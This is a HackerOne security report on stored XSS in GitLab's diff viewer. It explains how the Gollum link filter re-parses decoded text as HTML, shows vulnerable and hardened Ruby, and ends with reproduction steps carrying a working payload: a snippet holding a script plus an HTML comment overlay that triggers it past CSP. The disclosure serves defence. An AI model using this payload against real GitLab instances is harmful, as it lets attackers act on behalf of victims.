Stored-XSS injected in diff viewer
HackerOne report #2441257 by yvvdwf
on 2024-03-29, assigned to @cmaxim:
Report
Hello,
GitLab recently changed the sanitization of Gollum links:
### https://gitlab.com/gitlab-org/gitlab/-/blob/5368a427e4ee6be16d8d38f62268efaf19ef0dea/lib/banzai/filter/gollum_tags_filter.rb#L67
```ruby
doc.xpath('descendant-or-self::text()').each do |node|
  next if has_ancestor?(node, IGNORED_ANCESTOR_TAGS)
  next unless node.content =~ TAGS_PATTERN
  # node.content is the decoded plaintext of the text node
  html = node.content.gsub(TAGS_PATTERN) do
    process_tag(Regexp.last_match(1)) || Regexp.last_match(0)
  end
  # the resulting string is re-parsed as HTML when it replaces the node
  node.replace(html)
end
```
Because `node.content` is used, the decoded plaintext of the text node (including any markup that was previously escaped into text) is handed to `node.replace(html)`, which re-parses it as HTML. This allows injecting arbitrary HTML elements.
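As an added illustration (not the report's or GitLab's code) of why the `node.content` round trip is dangerous, the stand-alone Ruby below models the filter's substitution on the decoded text of a text node, once in the vulnerable shape and once with every non-tag segment re-escaped. `process_tag`, the `/wiki/` link shape and the sample payload are constructed stand-ins for this example, not the project's real implementation.

```ruby
require "cgi"

# Gollum wiki-link syntax: [[Page Title]] (constructed to mirror the filter's pattern).
TAGS_PATTERN = /\[\[(.+?)\]\]/

# Hypothetical stand-in for Banzai's process_tag: only a plain page title becomes a
# link; anything else returns nil so the original text is kept.
def process_tag(tag)
  title = tag.strip
  return nil unless title.match?(/\A[\w\- ]+\z/)
  slug = CGI.escapeHTML(title.tr(" ", "-"))
  %(<a href="/wiki/#{slug}">#{CGI.escapeHTML(title)}</a>)
end

# Vulnerable shape (as in the report): `text` is what node.content returns, i.e. the
# already-decoded text of a text node. Emitting it unchanged turns escaped markup such
# as "&lt;div&gt;" back into a live "<div>" once node.replace(html) re-parses it.
def expand_tags_vulnerable(text)
  text.gsub(TAGS_PATTERN) { process_tag(Regexp.last_match(1)) || Regexp.last_match(0) }
end

# Hardened shape: every non-tag segment is HTML-escaped again before it is emitted as
# markup; only the output of process_tag is trusted HTML.
def expand_tags_safe(text)
  out = +""
  last = 0
  text.scan(TAGS_PATTERN) do
    m = Regexp.last_match
    out << CGI.escapeHTML(text[last...m.begin(0)])
    out << (process_tag(m[1]) || CGI.escapeHTML(m[0]))
    last = m.end(0)
  end
  out << CGI.escapeHTML(text[last..])
end

# Constructed sample: decoded text of a comment's text node, shaped like the report's
# payload (the "<!--" swallows whatever follows, "[[ ]]" makes the filter run).
SAMPLE = %q(<div class=files data-diff-for-path=/-/snippets/EXAMPLE/raw/main/alert.json> <!-- [[ ]] see [[Home]])

if $PROGRAM_NAME == __FILE__
  puts "vulnerable: #{expand_tags_vulnerable(SAMPLE)}"
  puts "safe:       #{expand_tags_safe(SAMPLE)}"
end
```

The vulnerable variant returns the `<div ...>` and `<!--` as live markup, while the hardened variant returns them as `&lt;div ...&gt;` and `&lt;!--` and still renders `[[Home]]` as a link.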
Steps to reproduce
- Create a public snippet containing a JSON file `alert.json` with the content `{"html":"<script>alert(document.domain)</script>"}`, then open the raw version and make a note of its path, for example: https://gitlab.com/-/snippets/3683972/raw/main/alert.json
- In an existing project (or create a new project and make some commits), go to Code / Commits, open a commit to view its diff, then enter the following comment (after replacing the `data-diff-for-path` value with the path noted above):

  ```html
  <i><div class=files > <div class=diff-file> <div class=diff-content> <div data-diff-for-path=/-/snippets/3683972/raw/main/alert.json class=js-file-title style=position:fixed;top:0px;right:0px;bottom:0px;left:0px;z-index:99999> <!-- [[ ]]</i>
  ```

- Refresh the page; you might notice a topmost transparent layer. Click anywhere to trigger an alert.
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
Output of checks
This bug happens on GitLab.com